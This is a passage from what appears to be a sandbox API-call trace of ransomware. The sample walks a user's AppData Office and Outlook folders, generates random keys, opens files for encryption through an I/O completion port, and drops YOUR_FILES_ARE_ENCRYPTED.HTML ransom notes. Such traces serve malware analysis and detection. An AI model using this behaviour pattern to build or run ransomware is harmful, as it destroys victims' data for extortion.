(in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.082] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f81d62, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80f81d62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80f83167, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0123.082] StrStrIW (lpFirst="MSO1033.acl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.082] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 70 [0123.082] PathFindExtensionW (pszPath="MSO1033.acl") returned=".acl" [0123.083] lstrlenW (lpString=".acl") returned 4 [0123.083] PathFindExtensionW (pszPath="MSO1033.acl") returned=".acl" [0123.083] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0123.083] StrStrIW (lpFirst="Recent", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.083] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 65 [0123.083] GetProcessHeap () returned 0x600000 [0123.083] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0123.084] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0123.086] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0123.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f468e, dwReserved1=0x6f4618, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0123.086] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f468e, dwReserved1=0x6f4618, cFileName="..", cAlternateFileName="")) returned 1 [0123.087] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xa481d59b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa481d59b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1c, dwReserved0=0x6f468e, dwReserved1=0x6f4618, cFileName="index.dat", cAlternateFileName="")) returned 1 [0123.087] StrStrIW (lpFirst="index.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.087] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 75 [0123.087] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0123.087] lstrlenW (lpString=".dat") returned 4 [0123.087] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0123.087] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0123.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.088] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=28) returned 1 [0123.088] CloseHandle (hObject=0x320) returned 1 [0123.088] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4689310, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4ab, dwReserved0=0x6f468e, dwReserved1=0x6f4618, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0123.088] StrStrIW (lpFirst="Templates.LNK", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.088] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 79 [0123.088] PathFindExtensionW (pszPath="Templates.LNK") returned=".LNK" [0123.088] lstrlenW (lpString=".LNK") returned 4 [0123.088] PathFindExtensionW (pszPath="Templates.LNK") returned=".LNK" [0123.088] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4689310, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4ab, dwReserved0=0x6f468e, dwReserved1=0x6f4618, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0123.088] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0123.088] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0123.088] GetProcessHeap () returned 0x600000 [0123.088] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\office\\recent\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0123.090] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0123.091] CloseHandle (hObject=0x324) returned 1 [0123.091] GetProcessHeap () returned 0x600000 [0123.091] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.091] GetProcessHeap () returned 0x600000 [0123.091] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0123.091] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 0 [0123.091] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0123.091] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0123.091] GetProcessHeap () returned 0x600000 [0123.092] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.093] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.094] CloseHandle (hObject=0x308) returned 1 [0123.094] GetProcessHeap () returned 0x600000 [0123.094] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.094] GetProcessHeap () returned 0x600000 [0123.094] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.095] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Outlook", cAlternateFileName="")) returned 1 [0123.095] StrStrIW (lpFirst="Outlook", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.095] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook") returned 59 [0123.095] GetProcessHeap () returned 0x600000 [0123.095] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0123.096] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook" [0123.096] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0123.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0123.097] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.097] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abbe5b6, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6abbe5b6, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6acd6e90, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0123.097] StrStrIW (lpFirst="Outlook.srs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.097] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 71 [0123.097] PathFindExtensionW (pszPath="Outlook.srs") returned=".srs" [0123.097] lstrlenW (lpString=".srs") returned 4 [0123.097] PathFindExtensionW (pszPath="Outlook.srs") returned=".srs" [0123.097] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x87797b5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0123.098] StrStrIW (lpFirst="Outlook.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.098] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 71 [0123.098] PathFindExtensionW (pszPath="Outlook.xml") returned=".xml" [0123.098] lstrlenW (lpString=".xml") returned 4 [0123.098] PathFindExtensionW (pszPath="Outlook.xml") returned=".xml" [0123.098] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0123.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0123.099] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=2390) returned 1 [0123.099] GetProcessHeap () returned 0x600000 [0123.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.102] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="09") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="9B") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="90") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="B0") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="A5") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="B1") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="59") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="FE") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="51") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="B8") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="67") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="2A") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="90") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="ED") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="5A") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="09") returned 2 [0123.102] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="7B") returned 2 [0123.102] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="26") returned 2 [0123.102] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="02") returned 2 [0123.102] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="85") returned 2 [0123.102] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="84") returned 2 [0123.102] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="32") returned 2 [0123.102] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="B8") returned 2 [0123.103] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="32") returned 2 [0123.103] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="63") returned 2 [0123.103] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="DA") returned 2 [0123.103] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="F2") returned 2 [0123.103] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="DA") returned 2 [0123.103] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="FB") returned 2 [0123.103] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="F2") returned 2 [0123.103] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="65") returned 2 [0123.103] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="53") returned 2 [0123.103] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" [0123.104] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.104] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.104] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x87797b5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0123.104] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0123.104] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0123.104] GetProcessHeap () returned 0x600000 [0123.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\outlook\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.105] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.106] CloseHandle (hObject=0x308) returned 1 [0123.110] GetProcessHeap () returned 0x600000 [0123.110] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.110] GetProcessHeap () returned 0x600000 [0123.110] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.110] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Protect", cAlternateFileName="")) returned 1 [0123.110] StrStrIW (lpFirst="Protect", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.110] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect") returned 59 [0123.110] GetProcessHeap () returned 0x600000 [0123.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0123.110] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect" [0123.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*" [0123.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0123.111] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.111] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91e9a4bb, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x138, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0123.111] StrStrIW (lpFirst="CREDHIST", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 